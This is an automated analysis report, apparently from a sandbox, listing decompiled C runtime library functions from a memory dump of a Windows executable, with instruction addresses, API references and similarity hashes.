                                                                                                                                                                                            • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
                                                                                                                                                                                          • Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2805327698-0
                                                                                                                                                                                          • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                          • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                          				signed int _t15;
                                                                                                                                                                                          				LONG* _t21;
                                                                                                                                                                                          				long _t23;
                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                          				LONG* _t33;
                                                                                                                                                                                          				void* _t34;
    void* _t35;

    _t35 = __eflags;
    _t29 = __edx;
    _t25 = __ebx;
    _push(0xc);
    _push(0x421490);
    E0040E1D8(__ebx, __edi, __esi);
    _t31 = E00410735(__ebx, __edx, __edi, _t35);
    _t15 =  *0x422e34; // 0xfffffffe
    if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
        E0040D6E0(_t25, 0xd);
         *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
        _t33 =  *(_t31 + 0x68);
         *(_t34 - 0x1c) = _t33;
        __eflags = _t33 -  *0x422d38; // 0x3191620
        if(__eflags != 0) {
            __eflags = _t33;
            if(_t33 != 0) {
                _t23 = InterlockedDecrement(_t33);
                __eflags = _t23;
                if(_t23 == 0) {
                    __eflags = _t33 - 0x422910;
                    if(__eflags != 0) {
                        _push(_t33);
                        E0040B6B5(_t25, _t31, _t33, __eflags);
                    }
                }
            }
            _t21 =  *0x422d38; // 0x3191620
             *(_t31 + 0x68) = _t21;
            _t33 =  *0x422d38; // 0x3191620
             *(_t34 - 0x1c) = _t33;
            InterlockedIncrement(_t33);
        }
         *(_t34 - 4) = 0xfffffffe;
        E00414067();
    } else {
        _t33 =  *(_t31 + 0x68);
    }
    if(_t33 == 0) {
        E0040E79A(_t29, _t31, 0x20);
    }
    return E0040E21D(_t33);
}

0x00413fcc, 0x00413fcc, 0x00413fcc, 0x00413fcc, 0x00413fce, 0x00413fd3, 0x00413fdd, 0x00413fdf,
0x00413fe7, 0x00414008, 0x0041400e, 0x00414012, 0x00414015, 0x00414018, 0x0041401e, 0x00414020,
0x00414022, 0x00414025, 0x0041402b, 0x0041402d, 0x0041402f, 0x00414035, 0x00414037, 0x00414038,
0x0041403d, 0x00414035, 0x0041402d, 0x0041403e, 0x00414043, 0x00414046, 0x0041404c, 0x00414050,
0x00414050, 0x00414056, 0x0041405d, 0x00413fef, 0x00413fef, 0x00413fef, 0x00413ff4, 0x00413ff8,
0x00413ffd, 0x00414005

APIs
• __getptd.LIBCMT ref: 00413FD8
  • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
  • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
• __amsg_exit.LIBCMT ref: 00413FF8
• __lock.LIBCMT ref: 00414008
• InterlockedDecrement.KERNEL32(?), ref: 00414025
• InterlockedIncrement.KERNEL32(03191620), ref: 00414050
Memory Dump Source
• Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
• Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp
Similarity
• API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
• String ID:
• API String ID: 4271482742-0
• Opcode ID: aa7d619cf8389dd089defdc1841a73599edba9035eebd195b120bdc965c73694
• Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
• Opcode Fuzzy Hash: aa7d619cf8389dd089defdc1841a73599edba9035eebd195b120bdc965c73694
• Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 65%
E00413610() {
    signed long long _v12;
    signed int _v20;
    signed long long _v28;
    signed char _t8;

    _t8 = GetModuleHandleA("KERNEL32");
    if(_t8 == 0) {
        L6:
        _v20 =  *0x41fb50;
        _v28 =  *0x41fb48;
        asm("fsubr qword [ebp-0x18]");
        _v12 = _v28 / _v20 * _v20;
        asm("fld1");
        asm("fcomp qword [ebp-0x8]");
        asm("fnstsw ax");
        if((_t8 & 0x00000005) != 0) {
            return 0;
        } else {
            return 1;
        }
    } else {
        __eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
        if(__eax == 0) {
            goto L6;
        } else {
            _push(0);
            return __eax;
        }
    }
}

0x00413615, 0x0041361d, 0x00413634, 0x004135e0, 0x004135e9, 0x004135f5, 0x004135f8, 0x004135fb,
0x004135fd, 0x00413600, 0x00413605, 0x0041360f, 0x00413607, 0x0041360b, 0x0041360b, 0x0041361f,
0x00413625, 0x0041362d, 0x00000000, 0x0041362f, 0x0041362f, 0x00413633, 0x00413633, 0x0041362d

APIs
• GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
• GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
Strings
Memory Dump Source
• Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
• Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp
Similarity
• API ID: AddressHandleModuleProc
• String ID: IsProcessorFeaturePresent$KERNEL32
• API String ID: 1646373207-3105848591
• Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
• Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
• Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
• Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 86%
E0040C748(void* __edx, void* __esi, char _a4) {
	signed int _v8;
	signed int _v12;
	signed int _v16;
	void* __ebx;
	void* __edi;
	void* __ebp;
	signed int _t70;
	signed int _t71;
	intOrPtr _t73;
	signed int _t75;
	signed int _t81;
	char _t82;
	signed int _t84;
	intOrPtr* _t86;
	signed int _t87;
	intOrPtr* _t90;
	signed int _t92;
	signed int _t94;
	void* _t96;
	signed char _t98;
	signed int _t99;
	intOrPtr _t102;
	signed int _t103;
	intOrPtr* _t104;
	signed int _t111;
	signed int _t114;
	intOrPtr _t115;

	_t105 = __esi;
	_t97 = __edx;
	_t104 = _a4;
	_t87 = 0;
	_t121 = _t104;
	if(_t104 != 0) {
		_t70 = E0040FA20(__edx, _t104, _t104);
		__eflags =  *(_t104 + 4);
		_v8 = _t70;
		if(__eflags < 0) {
			 *(_t104 + 4) = 0;
		}
		_push(1);
		_push(_t87);
		_push(_t70);
		_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
		__eflags = _t71 - _t87;
		_v12 = _t71;
		if(_t71 < _t87) {
			L2:
			return _t71 | 0xffffffff;
		} else {
			_t98 =  *(_t104 + 0xc);
			__eflags = _t98 & 0x00000108;
			if((_t98 & 0x00000108) != 0) {
				_t73 =  *_t104;
				_t92 =  *(_t104 + 8);
				_push(_t105);
				_v16 = _t73 - _t92;
				__eflags = _t98 & 0x00000003;
				if((_t98 & 0x00000003) == 0) {
					__eflags = _t98;
					if(__eflags < 0) {
						L15:
						__eflags = _v12 - _t87;
						if(_v12 != _t87) {
							__eflags =  *(_t104 + 0xc) & 0x00000001;
							if(( *(_t104 + 0xc) & 0x00000001) == 0) {
								L40:
								_t75 = _v16 + _v12;
								__eflags = _t75;
								L41:
								return _t75;
							}
							_t99 =  *(_t104 + 4);
							__eflags = _t99 - _t87;
							if(_t99 != _t87) {
								_t90 = 0x423f60 + (_v8 >> 5) * 4;
								_a4 = _t73 - _t92 + _t99;
								_t111 = (_v8 & 0x0000001f) << 6;
								__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
								if(__eflags == 0) {
									L39:
									_t66 =  &_v12;
									 *_t66 = _v12 - _a4;
									__eflags =  *_t66;
									goto L40;
								}
								_push(2);
								_push(0);
								_push(_v8);
								__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
								if(__eflags != 0) {
									_push(0);
									_push(_v12);
									_push(_v8);
									_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
									__eflags = _t81;
									if(_t81 >= 0) {
										_t82 = 0x200;
										__eflags = _a4 - 0x200;
										if(_a4 > 0x200) {
											L35:
											_t82 =  *((intOrPtr*)(_t104 + 0x18));
											L36:
											_a4 = _t82;
											__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
											L37:
											if(__eflags != 0) {
												_t63 =  &_a4;
												 *_t63 = _a4 + 1;
												__eflags =  *_t63;
											}
											goto L39;
										}
										_t94 =  *(_t104 + 0xc);
										__eflags = _t94 & 0x00000008;
										if((_t94 & 0x00000008) == 0) {
											goto L35;
										}
										__eflags = _t94 & 0x00000400;
										if((_t94 & 0x00000400) == 0) {
											goto L36;
										}
										goto L35;
									}
									L31:
									_t75 = _t81 | 0xffffffff;
									goto L41;
								}
								_t84 =  *(_t104 + 8);
								_t96 = _a4 + _t84;
								while(1) {
									__eflags = _t84 - _t96;
									if(_t84 >= _t96) {
										break;
									}
									__eflags =  *_t84 - 0xa;
									if( *_t84 == 0xa) {
										_t44 =  &_a4;
                                                                                                                                                                                          													 *_t44 = _a4 + 1;
                                                                                                                                                                                          													__eflags =  *_t44;
                                                                                                                                                                                          												}
                                                                                                                                                                                          												_t84 = _t84 + 1;
                                                                                                                                                                                          												__eflags = _t84;
                                                                                                                                                                                          											}
                                                                                                                                                                                          											__eflags =  *(_t104 + 0xc) & 0x00002000;
                                                                                                                                                                                          											goto L37;
                                                                                                                                                                                          										}
                                                                                                                                                                                          										_v16 = _t87;
                                                                                                                                                                                          										goto L40;
                                                                                                                                                                                          									}
                                                                                                                                                                                          									_t75 = _v16;
                                                                                                                                                                                          									goto L41;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_t81 = E0040BFC1(__eflags);
                                                                                                                                                                                          								 *_t81 = 0x16;
                                                                                                                                                                                          								goto L31;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
                                                                                                                                                                                          							_t114 = (_v8 & 0x0000001f) << 6;
                                                                                                                                                                                          							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
                                                                                                                                                                                          							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
                                                                                                                                                                                          								goto L15;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							_t103 = _t92;
                                                                                                                                                                                          							__eflags = _t103 - _t73;
                                                                                                                                                                                          							if(_t103 >= _t73) {
                                                                                                                                                                                          								goto L15;
                                                                                                                                                                                          							}
                                                                                                                                                                                          							_t115 = _t73;
                                                                                                                                                                                          							do {
                                                                                                                                                                                          								__eflags =  *_t103 - 0xa;
                                                                                                                                                                                          								if( *_t103 == 0xa) {
                                                                                                                                                                                          									_v16 = _v16 + 1;
                                                                                                                                                                                          									_t87 = 0;
                                                                                                                                                                                          									__eflags = 0;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_t103 = _t103 + 1;
                                                                                                                                                                                          								__eflags = _t103 - _t115;
                                                                                                                                                                                          							} while (_t103 < _t115);
                                                                                                                                                                                          							goto L15;
                                                                                                                                                                                          						}
                                                                                                                                                                                          						return _t71 -  *(_t104 + 4);
                                                                                                                                                                                          					}
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_t86 = E0040BFC1(_t121);
                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                          				 *_t86 = 0x16;
                                                                                                                                                                                          				_t71 = E0040E744(__edx, _t104, __esi);
                                                                                                                                                                                          				goto L2;
                                                                                                                                                                                          			}
0x0040c748
0x0040c748
0x0040c752
0x0040c755
0x0040c757
0x0040c759
0x0040c77c
0x0040c781
0x0040c785
0x0040c788
0x0040c78a
0x0040c78a
0x0040c78d
0x0040c78f
0x0040c790
0x0040c791
0x0040c799
0x0040c79b
0x0040c79e
0x0040c773
0x00000000
0x0040c7a0
0x0040c7a0
0x0040c7a3
0x0040c7a9
0x0040c7b3
0x0040c7b5
0x0040c7b8
0x0040c7bd
0x0040c7c0
0x0040c7c3
0x0040c806
0x0040c808
0x0040c7f9
0x0040c7f9
0x0040c7fc
0x0040c81a
0x0040c81e
0x0040c8d8
0x0040c8de
0x0040c8de
0x0040c8e0
0x00000000
0x0040c8e0
0x0040c824
0x0040c827
0x0040c829
0x0040c843
0x0040c84a
0x0040c84f
0x0040c852
0x0040c857
0x0040c8d2
0x0040c8d5
0x0040c8d5
0x0040c8d5
0x00000000
0x0040c8d5
0x0040c859
0x0040c85b
0x0040c85d
0x0040c868
0x0040c86b
0x0040c88d
0x0040c88f
0x0040c892
0x0040c895
0x0040c89d
0x0040c89f
0x0040c8a6
0x0040c8ab
0x0040c8ae
0x0040c8c0
0x0040c8c0
0x0040c8c3
0x0040c8c3
0x0040c8c8
0x0040c8cd
0x0040c8cd
0x0040c8cf
0x0040c8cf
0x0040c8cf
0x0040c8cf
0x00000000
0x0040c8cd
0x0040c8b0
0x0040c8b3
0x0040c8b6
0x00000000
0x00000000
0x0040c8b8
0x0040c8be
0x00000000
0x00000000
0x00000000
0x0040c8be
0x0040c8a1
0x0040c8a1
0x00000000
0x0040c8a1
0x0040c86d
0x0040c873
0x0040c880
0x0040c880
                                                                                                                                                                                          0x0040c882
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c877
                                                                                                                                                                                          0x0040c87a
                                                                                                                                                                                          0x0040c87c
                                                                                                                                                                                          0x0040c87c
                                                                                                                                                                                          0x0040c87c
                                                                                                                                                                                          0x0040c87c
                                                                                                                                                                                          0x0040c87f
                                                                                                                                                                                          0x0040c87f
                                                                                                                                                                                          0x0040c87f
                                                                                                                                                                                          0x0040c884
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c884
                                                                                                                                                                                          0x0040c82b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c82b
                                                                                                                                                                                          0x0040c7fe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c7fe
                                                                                                                                                                                          0x0040c80a
                                                                                                                                                                                          0x0040c80f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c80f
                                                                                                                                                                                          0x0040c7ce
                                                                                                                                                                                          0x0040c7d8
                                                                                                                                                                                          0x0040c7db
                                                                                                                                                                                          0x0040c7e0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c7e2
                                                                                                                                                                                          0x0040c7e4
                                                                                                                                                                                          0x0040c7e6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c7e8
                                                                                                                                                                                          0x0040c7ea
                                                                                                                                                                                          0x0040c7ea
                                                                                                                                                                                          0x0040c7ed
                                                                                                                                                                                          0x0040c7ef
                                                                                                                                                                                          0x0040c7f2
                                                                                                                                                                                          0x0040c7f2
                                                                                                                                                                                          0x0040c7f2
                                                                                                                                                                                          0x0040c7f4
                                                                                                                                                                                          0x0040c7f5
                                                                                                                                                                                          0x0040c7f5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c7ea
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040c7ab
                                                                                                                                                                                          0x0040c79e
                                                                                                                                                                                          0x0040c75b
                                                                                                                                                                                          0x0040c760
                                                                                                                                                                                          0x0040c761
                                                                                                                                                                                          0x0040c762
                                                                                                                                                                                          0x0040c763
                                                                                                                                                                                          0x0040c764
                                                                                                                                                                                          0x0040c765
                                                                                                                                                                                          0x0040c76b
                                                                                                                                                                                          0x00000000

APIs
• __fileno.LIBCMT ref: 0040C77C
• __locking.LIBCMT ref: 0040C791
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Memory Dump Source
• Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
• Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp
Similarity
• API ID: __decode_pointer__fileno__getptd_noexit__locking
• String ID:
• API String ID: 2395185920-0
• Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
• Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
• Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
• Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 97%
E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
	void* __edi;
	void* __esi;
	signed int _t30;
	signed int _t31;
	signed int _t32;
	signed int _t33;
	signed int _t35;
	signed int _t39;
	void* _t42;
	intOrPtr _t43;
	void* _t45;
	signed int _t48;
	signed int* _t53;
	void* _t54;
	void* _t55;
	void* _t57;

	_t54 = __ebp;
	_t45 = __edx;
	_t42 = __ebx;
	_t53 = _a4;
	if(_t53 == 0) {
		L40:
		_t31 = _t30 | 0xffffffff;
		__eflags = _t31;
		return _t31;
	} else {
		_t43 = _a12;
		if(_t43 == 2) {
			goto L40;
		} else {
			_t30 = _t53[0xe];
			if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
				goto L40;
			} else {
				_t48 = _a8;
				if(_t53[0x17] != 0x77) {
					__eflags = _t43 - 1;
					if(_t43 == 1) {
						_t48 = _t48 + _t53[0x1a];
						__eflags = _t48;
					}
					__eflags = _t48;
					if(_t48 < 0) {
						goto L39;
					} else {
						__eflags = _t53[0x16];
						if(__eflags == 0) {
							_t33 = _t53[0x1a];
							__eflags = _t48 - _t33;
							if(_t48 < _t33) {
								_t30 = E004054F0(_t42, _t54, _t53);
								_t55 = _t55 + 4;
								__eflags = _t30;
								if(_t30 < 0) {
									goto L39;
								} else {
									goto L27;
								}
							} else {
								_t48 = _t48 - _t33;
								L27:
								__eflags = _t48;
								if(_t48 == 0) {
									L38:
									return _t53[0x1a];
								} else {
									__eflags = _t53[0x12];
									if(_t53[0x12] != 0) {
										L30:
										__eflags = _t53[0x1b] - 0xffffffff;
										if(_t53[0x1b] != 0xffffffff) {
                                                                                                                                                                                          														_t53[0x1a] = _t53[0x1a] + 1;
                                                                                                                                                                                          														_t48 = _t48 - 1;
                                                                                                                                                                                          														__eflags = _t53[0x1c];
                                                                                                                                                                                          														_t53[0x1b] = 0xffffffff;
                                                                                                                                                                                          														if(_t53[0x1c] != 0) {
                                                                                                                                                                                          															_t53[0xe] = 1;
                                                                                                                                                                                          														}
                                                                                                                                                                                          													}
                                                                                                                                                                                          													__eflags = _t48;
                                                                                                                                                                                          													if(_t48 <= 0) {
                                                                                                                                                                                          														goto L38;
                                                                                                                                                                                          													} else {
                                                                                                                                                                                          														while(1) {
                                                                                                                                                                                          															_t35 = 0x4000;
                                                                                                                                                                                          															__eflags = _t48 - 0x4000;
                                                                                                                                                                                          															if(_t48 < 0x4000) {
                                                                                                                                                                                          																_t35 = _t48;
                                                                                                                                                                                          															}
                                                                                                                                                                                          															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
                                                                                                                                                                                          															_t55 = _t55 + 0xc;
                                                                                                                                                                                          															__eflags = _t30;
                                                                                                                                                                                          															if(_t30 <= 0) {
                                                                                                                                                                                          																goto L39;
                                                                                                                                                                                          															}
                                                                                                                                                                                          															_t48 = _t48 - _t30;
                                                                                                                                                                                          															__eflags = _t48;
                                                                                                                                                                                          															if(_t48 > 0) {
                                                                                                                                                                                          																continue;
                                                                                                                                                                                          															} else {
                                                                                                                                                                                          																goto L38;
                                                                                                                                                                                          															}
                                                                                                                                                                                          															goto L41;
                                                                                                                                                                                          														}
                                                                                                                                                                                          														goto L39;
                                                                                                                                                                                          													}
                                                                                                                                                                                          												} else {
                                                                                                                                                                                          													_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                                                                                                                                          													_t55 = _t55 + 4;
                                                                                                                                                                                          													_t53[0x12] = _t30;
                                                                                                                                                                                          													__eflags = _t30;
                                                                                                                                                                                          													if(_t30 == 0) {
                                                                                                                                                                                          														goto L39;
                                                                                                                                                                                          													} else {
                                                                                                                                                                                          														goto L30;
                                                                                                                                                                                          													}
                                                                                                                                                                                          												}
                                                                                                                                                                                          											}
                                                                                                                                                                                          										}
                                                                                                                                                                                          									} else {
                                                                                                                                                                                          										_push(0);
                                                                                                                                                                                          										_push(_t48);
                                                                                                                                                                                          										_push(_t53[0x10]);
                                                                                                                                                                                          										_t53[0x1b] = 0xffffffff;
                                                                                                                                                                                          										_t53[1] = 0;
                                                                                                                                                                                          										 *_t53 = _t53[0x11];
                                                                                                                                                                                          										_t30 = E0040C46B(_t42, _t53[0x10], _t48, _t53, __eflags);
                                                                                                                                                                                          										__eflags = _t30;
                                                                                                                                                                                          										if(_t30 < 0) {
                                                                                                                                                                                          											goto L39;
                                                                                                                                                                                          										} else {
                                                                                                                                                                                          											_t53[0x1a] = _t48;
                                                                                                                                                                                          											_t53[0x19] = _t48;
                                                                                                                                                                                          											return _t48;
                                                                                                                                                                                          										}
                                                                                                                                                                                          									}
                                                                                                                                                                                          								}
                                                                                                                                                                                          							} else {
                                                                                                                                                                                          								if(_t43 == 0) {
                                                                                                                                                                                          									_t48 = _t48 - _t53[0x19];
                                                                                                                                                                                          								}
                                                                                                                                                                                          								if(_t48 < 0) {
                                                                                                                                                                                          									L39:
                                                                                                                                                                                          									_t32 = _t30 | 0xffffffff;
                                                                                                                                                                                          									__eflags = _t32;
                                                                                                                                                                                          									return _t32;
                                                                                                                                                                                          								} else {
                                                                                                                                                                                          									if(_t53[0x11] != 0) {
                                                                                                                                                                                          										L11:
                                                                                                                                                                                          										if(_t48 <= 0) {
                                                                                                                                                                                          											L17:
                                                                                                                                                                                          											return _t53[0x19];
                                                                                                                                                                                          										} else {
                                                                                                                                                                                          											while(1) {
                                                                                                                                                                                          												_t39 = 0x4000;
                                                                                                                                                                                          												if(_t48 < 0x4000) {
                                                                                                                                                                                          													_t39 = _t48;
                                                                                                                                                                                          												}
                                                                                                                                                                                          												_t30 = E00405260(_t42, _t45, _t53, _t53[0x11], _t39);
                                                                                                                                                                                          												_t55 = _t55 + 0xc;
                                                                                                                                                                                          												if(_t30 == 0) {
                                                                                                                                                                                          													goto L39;
                                                                                                                                                                                          												}
                                                                                                                                                                                          												_t48 = _t48 - _t30;
                                                                                                                                                                                          												if(_t48 > 0) {
                                                                                                                                                                                          													continue;
                                                                                                                                                                                          												} else {
                                                                                                                                                                                          													goto L17;
                                                                                                                                                                                          												}
                                                                                                                                                                                          												goto L41;
                                                                                                                                                                                          											}
                                                                                                                                                                                          											goto L39;
                                                                                                                                                                                          										}
                                                                                                                                                                                          									} else {
                                                                                                                                                                                          										_t30 = E0040B84D(_t42, _t45, _t48, 0x4000);
                                                                                                                                                                                          										_t57 = _t55 + 4;
                                                                                                                                                                                          										_t53[0x11] = _t30;
                                                                                                                                                                                          										if(_t30 == 0) {
                                                                                                                                                                                          											goto L39;
                                                                                                                                                                                          										} else {
                                                                                                                                                                                          											E0040BA30(_t48, _t30, 0, 0x4000);
                                                                                                                                                                                          											_t55 = _t57 + 0xc;
                                                                                                                                                                                          											goto L11;
                                                                                                                                                                                          										}
                                                                                                                                                                                          									}
                                                                                                                                                                                          								}
                                                                                                                                                                                          							}
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          				}
                                                                                                                                                                                          				L41:
                                                                                                                                                                                          			}
[Instruction address column that accompanied the decompiled listing above (0x00405d00 through 0x00405e83, with 0x00000000 entries for lines carrying no mapped address); the per-line alignment with the C code did not survive extraction, so only the address range is kept here.]
                                                                                                                                                                                          0x00405dfd
                                                                                                                                                                                          0x00405e04
                                                                                                                                                                                          0x00405e09
                                                                                                                                                                                          0x00405e0c
                                                                                                                                                                                          0x00405e0e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405dff
                                                                                                                                                                                          0x00405dff
                                                                                                                                                                                          0x00405e10
                                                                                                                                                                                          0x00405e10
                                                                                                                                                                                          0x00405e12
                                                                                                                                                                                          0x00405e73
                                                                                                                                                                                          0x00405e78
                                                                                                                                                                                          0x00405e14
                                                                                                                                                                                          0x00405e14
                                                                                                                                                                                          0x00405e18
                                                                                                                                                                                          0x00405e2e
                                                                                                                                                                                          0x00405e2e
                                                                                                                                                                                          0x00405e32
                                                                                                                                                                                          0x00405e34
                                                                                                                                                                                          0x00405e37
                                                                                                                                                                                          0x00405e38
                                                                                                                                                                                          0x00405e3c
                                                                                                                                                                                          0x00405e43
                                                                                                                                                                                          0x00405e45
                                                                                                                                                                                          0x00405e45
                                                                                                                                                                                          0x00405e43
                                                                                                                                                                                          0x00405e4c
                                                                                                                                                                                          0x00405e4e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405e50
                                                                                                                                                                                          0x00405e50
                                                                                                                                                                                          0x00405e50
                                                                                                                                                                                          0x00405e55
                                                                                                                                                                                          0x00405e57
                                                                                                                                                                                          0x00405e59
                                                                                                                                                                                          0x00405e59
                                                                                                                                                                                          0x00405e61
                                                                                                                                                                                          0x00405e66
                                                                                                                                                                                          0x00405e69
                                                                                                                                                                                          0x00405e6b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405e6d
                                                                                                                                                                                          0x00405e6f
                                                                                                                                                                                          0x00405e71
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405e71
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405e50
                                                                                                                                                                                          0x00405e1a
                                                                                                                                                                                          0x00405e1f
                                                                                                                                                                                          0x00405e24
                                                                                                                                                                                          0x00405e27
                                                                                                                                                                                          0x00405e2a
                                                                                                                                                                                          0x00405e2c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405e2c
                                                                                                                                                                                          0x00405e18
                                                                                                                                                                                          0x00405e12
                                                                                                                                                                                          0x00405dc3
                                                                                                                                                                                          0x00405dc9
                                                                                                                                                                                          0x00405dcb
                                                                                                                                                                                          0x00405dcc
                                                                                                                                                                                          0x00405dcd
                                                                                                                                                                                          0x00405dd4
                                                                                                                                                                                          0x00405ddb
                                                                                                                                                                                          0x00405ddd
                                                                                                                                                                                          0x00405de5
                                                                                                                                                                                          0x00405de7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405ded
                                                                                                                                                                                          0x00405ded
                                                                                                                                                                                          0x00405df0
                                                                                                                                                                                          0x00405df7
                                                                                                                                                                                          0x00405df7
                                                                                                                                                                                          0x00405de7
                                                                                                                                                                                          0x00405dc1
                                                                                                                                                                                          0x00405d3a
                                                                                                                                                                                          0x00405d3c
                                                                                                                                                                                          0x00405d3e
                                                                                                                                                                                          0x00405d3e
                                                                                                                                                                                          0x00405d43
                                                                                                                                                                                          0x00405e79
                                                                                                                                                                                          0x00405e7a
                                                                                                                                                                                          0x00405e7a
                                                                                                                                                                                          0x00405e7e
                                                                                                                                                                                          0x00405d49
                                                                                                                                                                                          0x00405d4d
                                                                                                                                                                                          0x00405d77
                                                                                                                                                                                          0x00405d79
                                                                                                                                                                                          0x00405da7
                                                                                                                                                                                          0x00405dac
                                                                                                                                                                                          0x00405d7b
                                                                                                                                                                                          0x00405d80
                                                                                                                                                                                          0x00405d80
                                                                                                                                                                                          0x00405d87
                                                                                                                                                                                          0x00405d89
